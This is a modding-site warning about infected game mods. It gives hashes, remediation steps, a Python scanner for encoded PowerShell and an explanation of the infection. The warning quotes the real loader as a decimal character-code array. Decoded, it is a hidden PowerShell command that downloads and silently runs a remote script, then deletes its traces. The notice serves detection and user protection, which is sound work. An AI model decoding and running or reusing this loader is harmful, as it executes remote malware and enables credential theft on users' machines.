📢 Attention about malware in mods


If you had installed the following mods:

  • "Auto Save on Exit" by Subaiy. MD5 hash - 6246fa47c492250128cbb4a463d2161a
  • "Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine). MD5 hash - bcee56cc847489a2a328189ba882d95e
  • "Enemies Drop Better Loot" by Krunker (if you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da

Your PC is likely infected with malware. Do a proper reset of your computer.

What are we gonna do next?

  1. We are going to look for moderators to look at new mods for RTV.
  2. We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.

What can you do

  • Again, if you are infected, factory reset your computer.
  • Search for suspicious things in the mods you download (like "powershell").
    These attacks all follow the same pattern: they execute a PowerShell script using some encoded URL:
    [64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34]
  • Check file hash of the file you downloaded using: https://hash-file.online.
  • Any mod containing a PowerShell script without a good reason should be reported to moderators.
  • Any mod that isn't open-source should be reported.
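
The checks listed in the post above can be run locally: this added example (not part of the original post and not modworkshop.net's tooling) compares a file's MD5 against the three hashes listed there and decodes decimal character-code arrays, so a plain search for "powershell" still works when the command is hidden as numbers. The function names, the 20-number threshold and both sample inputs are assumptions constructed for illustration.

```python
import hashlib
import re

# MD5 hashes of the infected downloads, copied from the announcement above.
KNOWN_BAD_MD5 = {
    "6246fa47c492250128cbb4a463d2161a",  # "Auto Save on Exit"
    "bcee56cc847489a2a328189ba882d95e",  # "Kill Counter"
    "ba9e7d88f1079c0324d53bde5786e4da",  # "Enemies Drop Better Loot"
}
# Warning signs named in the thread: PowerShell, a URL, a .ps1 script.
SUSPICIOUS = ("powershell", "http://", "https://", ".ps1")
# A bracketed run of 20+ decimal numbers (threshold is an assumption), e.g. [64,101,99,...].
CODE_ARRAY = re.compile(r"\[\s*\d{1,3}(?:\s*,\s*\d{1,3}){19,}\s*\]")


def decode_code_arrays(text):
    """Return the string hidden in each decimal character-code array in text."""
    decoded = []
    for match in CODE_ARRAY.finditer(text):
        codes = [int(n) for n in re.findall(r"\d+", match.group())]
        if all(c < 256 for c in codes):  # only byte-sized values can be character codes
            decoded.append(bytes(codes).decode("latin-1"))
    return decoded


def scan_mod_file(data):
    """Scan one file's bytes and return findings for manual review."""
    findings = []
    if hashlib.md5(data).hexdigest() in KNOWN_BAD_MD5:
        findings.append("MD5 matches a known infected download")
    text = data.decode("utf-8", errors="replace")
    hidden = decode_code_arrays(text)
    for source in [text] + hidden:
        hits = [s for s in SUSPICIOUS if s in source.lower()]
        if hits:
            where = "plain text" if source is text else "decoded array"
            findings.append(f"{where} contains: {', '.join(hits)}")
    return findings


# Constructed samples: a harmless command hidden the same way, and a clean script.
HIDDEN_SAMPLE = 'powershell.exe -c "Write-Output constructed-sample"'
SAMPLE_MOD = ("var cmd = [" + ",".join(str(ord(c)) for c in HIDDEN_SAMPLE) + "]\n").encode()
CLEAN_MOD = b"var kills = 0\nfunc on_kill():\n\tkills += 1\n"

if __name__ == "__main__":
    for name, data in (("sample", SAMPLE_MOD), ("clean", CLEAN_MOD)):
        print(name, scan_mod_file(data) or "no findings")
```

A finding means the file needs a manual look before it is installed; an empty result only means none of these specific signs were present.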

This message was written with the help of AI.

⚠️ For everyone who already KNOWS this mod is malware – here is what is actually happening and what it means:

If you used the mod, your PC has already:

  • Executed a hidden PowerShell command
  • Downloaded a remote script from the internet
  • Executed that script silently
  • Deleted the visible traces afterwards

This means:
👉 You did NOT just run a mod
👉 You allowed external code to run on your system


What is likely happening right now

Depending on what the downloaded script ("da.ps1") contained, your system could currently:

  • Have a stealer running (browser passwords, cookies, tokens)
  • Have a background connection to a remote server
  • Have additional malware installed
  • Have persistence (auto-start after reboot)

Even if you see NOTHING:
→ that is completely normal for this type of attack


What this means for you

  • Your accounts may already be compromised
  • Changing passwords too early = useless (they can be stolen again)
  • The infection may still be active in the background

What to do RIGHT NOW (no debate)

  1. Disconnect from internet
  2. Run full antivirus scan
  3. Run offline scan (important)
  4. Only AFTER that:
    • Change passwords
    • Enable 2FA
    • Log out all sessions

About the mod site

I will personally avoid modworkshop.net for now, as it currently feels unsafe to download from there until this situation is clarified.


Reset or not?

  • Full reset = safest option
  • No reset = possible, BUT only if you properly clean the system

Final reality check

This is not:

  • a bug
  • a mistake
  • a “harmless mod”

This is:
👉 a loader that executed remote code on your PC

Act accordingly.